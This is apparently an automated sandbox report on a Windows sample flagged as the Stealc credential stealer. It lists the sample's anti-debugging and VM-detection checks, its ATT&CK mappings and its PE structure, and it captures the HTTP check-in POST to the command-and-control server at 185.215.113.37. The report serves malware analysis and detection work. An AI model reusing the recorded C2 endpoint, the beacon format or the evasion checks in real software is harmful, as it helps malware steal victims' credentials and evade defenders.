                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_009438B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00944910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00944910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0093DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0093E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0093ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00944570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00944570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0093F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00943EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00943EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_009316D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0093DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0093BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00931160 GetSystemInfo,ExitProcess | 0_2_00931160
                Source: file.exe, file.exe, 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1791344815.0000000001615000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware]z
                Source: file.exe, 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1791344815.00000000015DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13652
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13655
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13674
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13666
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13706
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009345C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_009345C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00949860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00949860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00949750 mov eax, dword ptr fs:[00000030h] | 0_2_00949750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA | 0_2_009478E0
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 3228, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00949600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00949600
                Source: file.exe, file.exe, 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: fProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00947B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00947980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_00947980
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00947850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00947850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00947A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00947A30

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1731598111.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3228, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1731598111.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3228, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (one column per tactic; a leading number is the count of matched signatures for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/o | file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpB | file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpp | file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/( | file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpC | file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37n0B | file.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php7 | file.exe, 00000000.00000002.1791344815.00000000015DF000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1540589
                              Start date and time:2024-10-23 23:52:04 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 18s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:1
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 82
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.94700104517017
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'875'968 bytes
                              MD5:7abee0417c0e20b647a09a23767c082f
                              SHA1:15fb1c418c08318532b0468e4e1fc39935647abb
                              SHA256:b6a02f7945ee3ffe763c9a12d10ad6d03c327e625b8b31fd9cfb615ed633f3dd
                              SHA512:76c08c1f88aaea3f6f5f43283d04c25edaa440ab80a70c800c4689045e75a96d7d12361614bb511710497cd0132a639e0d92ef4f88c11988f5c91540b6a9448b
                              SSDEEP:49152:cZXb3p4sokSuMvZjAU8kxY2fNdt+UWkRgU3BF7bV:ATp4soiMBjqkxpd0iRxfb
                              TLSH:EC9533E1482213DFD0418BB40E2CDE41167018717794EB68626F6F34DAB6E946DEB8FD
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                              Icon Hash:90cececece8e8eb0
                              Entrypoint:0xaa9000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007FDA24F4FF2Ah
                              movd dword ptr [eax+eax], mm3
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007FDA24F51F25h
                              add bh, bh
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x228000 | 0d879e86377193ed55bafadf761accc7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2a6000 | 0x200 | 6c103240736358f30d8927e5c5fc6d55 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
saegsldb | 0x504000 | 0x1a4000 | 0x1a3e00 | 1eeb02f85286e3015f63baf5e5cab05b | False | 0.9947668576957428 | data | 7.953512758642051 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mkoehnsu | 0x6a8000 | 0x1000 | 0x400 | 10eb151582cfc80c1c9de480dea91ae7 | False | 0.7646484375 | data | 5.969175656960636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6a9000 | 0x3000 | 0x2200 | f46b9853e4fad235927c2ee4d1cdc75f | False | 0.0627297794117647 | DOS executable (COM) | 0.8288937216243366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-23T23:53:06.726996+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 23:53:05.521007061 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 23, 2024 23:53:05.526515007 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 23, 2024 23:53:05.526606083 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 23, 2024 23:53:05.526770115 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 23, 2024 23:53:05.532196999 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 23, 2024 23:53:06.438635111 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 23, 2024 23:53:06.438720942 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 23, 2024 23:53:06.441001892 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 23, 2024 23:53:06.446829081 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 23, 2024 23:53:06.726798058 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 23, 2024 23:53:06.726995945 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 23, 2024 23:53:10.006337881 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                              • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 3228 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 23:53:05.526770115 CEST | 89 | OUT | GET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
Oct 23, 2024 23:53:06.438635111 CEST | 203 | IN | HTTP/1.1 200 OK
                              Date: Wed, 23 Oct 2024 21:53:06 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
Oct 23, 2024 23:53:06.441001892 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJD
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 33 35 31 36 33 42 31 30 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 2d 2d 0d 0a
Data Ascii (multipart body, line breaks restored):
------CFHIIEHJKKECGCBFIIJD
Content-Disposition: form-data; name="hwid"

6335163B10381806970752
------CFHIIEHJKKECGCBFIIJD
Content-Disposition: form-data; name="build"

doma
------CFHIIEHJKKECGCBFIIJD--
Oct 23, 2024 23:53:06.726798058 CEST | 210 | IN | HTTP/1.1 200 OK
                              Date: Wed, 23 Oct 2024 21:53:06 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=

                              Target ID:0
                              Start time:17:53:01
                              Start date:23/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x930000
                              File size:1'875'968 bytes
                              MD5 hash:7ABEE0417C0E20B647A09A23767C082F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1731598111.0000000005300000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:8.2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10.1%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:24
